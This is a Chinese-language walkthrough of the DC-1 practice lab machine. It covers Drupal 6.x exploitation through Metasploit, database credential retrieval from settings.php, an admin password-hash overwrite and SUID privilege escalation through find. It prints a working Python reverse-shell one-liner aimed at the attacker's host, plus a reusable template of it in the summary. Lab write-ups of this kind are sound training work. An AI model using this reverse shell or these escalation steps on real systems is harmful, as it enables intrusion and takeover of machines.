DC-1靶机Walkthrough

Posted zhaoritian12138

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-1靶机Walkthrough相关的知识,希望对你有一定的参考价值。

DC~1: WalkThrough

技术图片



信息收集

主机发现

nmap -sP 10.0.0.1/24 --system-dns | grep 10.0.0. | egrep -v 10.0.0.1 | egrep -v 10.0.0.26 | awk ‘{print $5}‘ >> target.txt

技术图片

端口扫描

nmap --system-dns -T4 -A -iL target.txt

技术图片

查看网站robots.txt

技术图片

从目标网站UPGRADE.txt文件中初步判断网站版本为Drupal 6.x

漏洞利用

metasploit framework

搜索Drupal 6.x漏洞

技术图片

使用3--SQL注入模块

技术图片

运行,获取shell

技术图片

flag1

查看当前目录

技术图片

查看Drupal默认配置文件

技术图片

flag2

查看下载回本地的settings.php,获取flag2和数据库帐号密码

技术图片

flag3

再次进入msf中,使用python获得一个交互式shell

技术图片

登陆mysql

技术图片

技术图片

修改admin密码的hash值,该CMS中自带加密脚本

技术图片

技术图片

修改完成后访问浏览器进行登陆,输入账号:admin;密码:123

技术图片

查看flag3,提示需要使用find命令提权

技术图片

提权

SUID提权,find提权,使用命令查找suid权限的命令

find / -user root -perm -4000 -print 2>/dev/null

技术图片

使用find命令获取root权限的shell,并将其反弹给kali

find flag1.txt -exec python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘10.0.0.26‘,28670));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/sh‘,‘-i‘]);" ;   #需要查找一个已经存在的文件,并且命令末尾为" ;"

技术图片

flag4&flag5

flag5

技术图片

flag4

技术图片

总结

nmap结果过滤

nmap 只打印存活的主机,但不包括本机和网关

nmap -sP 10.0.0.1/24 --system-dns | grep 10.0.0. | egrep -v 10.0.0.1 | egrep -v 10.0.0.26 | awk ‘{print $5}‘ >> target.txt

python 获取shell

python反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘ip‘,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash‘,‘-i‘]);"

python模拟终端

python -c "import pty;pty.spawn(‘/bin/bash‘)"

mysql更新数据

mysql更新指定数据

update users set pass="$$‘,aoeu123" where uid=1;

SUID提权

使用find命令找到具有su权限的可执行文件,一般可用于提权的可执行文件为:Nmap、vim、find、bash、more、less、nano、cp

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

命令执行

find exisit.file -exec "whoami" ;      #需要查找一个存在的文件,exec命令最后使用空格+下划线+分号结束

以上是关于DC-1靶机Walkthrough的主要内容,如果未能解决你的问题,请参考以下文章

DC-5靶机WalkThrough

DC-5靶机WalkThrough

DC-3靶机WalkThrough

DC-3靶机WalkThrough

Vulnhub Bravery靶机 Walkthrough

靶机DC-1